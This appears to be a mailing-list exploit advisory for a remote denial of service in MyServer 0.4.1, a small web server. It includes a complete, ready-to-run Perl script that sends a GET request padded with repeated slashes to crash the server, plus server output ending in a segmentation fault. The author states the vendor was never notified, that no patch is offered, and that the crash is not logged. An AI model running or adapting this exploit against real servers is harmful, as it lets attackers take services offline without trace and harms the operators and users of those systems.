MyServer 0.4.1 is vulnerable to a denial of service when a GET request with 20 forward slashes gets sent to the server.
ca1b79e5b025115c5ec9cb904c864f70dc107b1f2555787902900093a7b61b14
Topic: MyServer 0.4.1 DOS
Product: Myserver 0.4.1 (http://myserverweb.sourceforge.net)
Note: yep, I'm on the dole, anyone wanna give me a job :)
Vendor Notification: Woooops, sorry i forgot ;)
Background:
(from homepage)
MyServer is a free and easy to configure web server. MyServer is licensed under the GNU General Public License (GPL). See the license page for additional info.
Myserver runs under both Windows and Linux..
Although there is allready several found flaws in Myserver, I thought that the closet bug to this was:
http://www.securityfocus.org/bid/7770/info/
but that was using excessive amounts of data.. We only need to use 20 "//" to cause a Dos condition..
Problem Description:
When Myserver is running a simple GET request can cause a Remote Denial of service, stopping the HTTP server
alltogether..
Also an extra note, this DOS doesn't get entered into the log file ;)
Impact:
Denial of service..possible code execution, haven't tested it fully yet..still finding holes ;)
Patch:
Nope i don't do patches.... ;)
Exploit:
----------------myserver.pl------------------------
#!/usr/bin/perl
#Myserver 0.4.1 Remote Denial of service ;)
#oh joy...
#deadbeat, uk2sec
#eip@oakey.no-ip.com
#deadbeat@sdf.lonestar.org
use IO::Socket;
$dos = "//"x100;
$request = "GET $dos"."HTTP/1.0\r\n\r\n";
$target = $ARGV[0];
print "\n\nMyserver 0.4.1 Remote Denial Of Service..\n";
print "deadbeat, uk2sec..\n";
print "usage: perl $0 <target>\n";
$sox = IO::Socket::INET->new(
Proto=>"tcp",
PeerPort=>"80",
PeerAddr=>"$target"
)or die "\nCan't connect to $target..\n";
print $sox $request;
sleep 2;
close $sox;
print "Done...\n";
------------------EOF--------------------------
Looks like this from the server side:
-------------------------
**************************************
************myServer 0.4.1************
**************************************
Initializing server configuration...
Using english language
Server configuration terminated
Security access is not used, the web folder contents is accessible to anyone
Initializing socket library...
Socket library was initialized
Computer name is: uk2sec-labs.no-ip.com
IP Address #0: 192.168.0.1
Loading MIME types...
MIME types loaded successfully: 139
Number of processors: 1
Creating thread 0...
Thread created
Creating listening thread...
Creating server socket...
Server socket created
Trying to binding port...
Port is binded
Trying to listen on port...
Listen on port: 80
Listening thread is created
myServer is now ready to accept connections
Press Ctrl+C to break execution
Segmentation fault
--------------------------
Tested on: Linux (redhat 9.0)
hello:
bazarr, good luck out there man ;)
regards,
deadbeat
----------------------------------------------------
"no i'n i'm not blackhat, whitehat or greyhat, i
enjoy my nice shade of green ;)"
----------------------------------------------------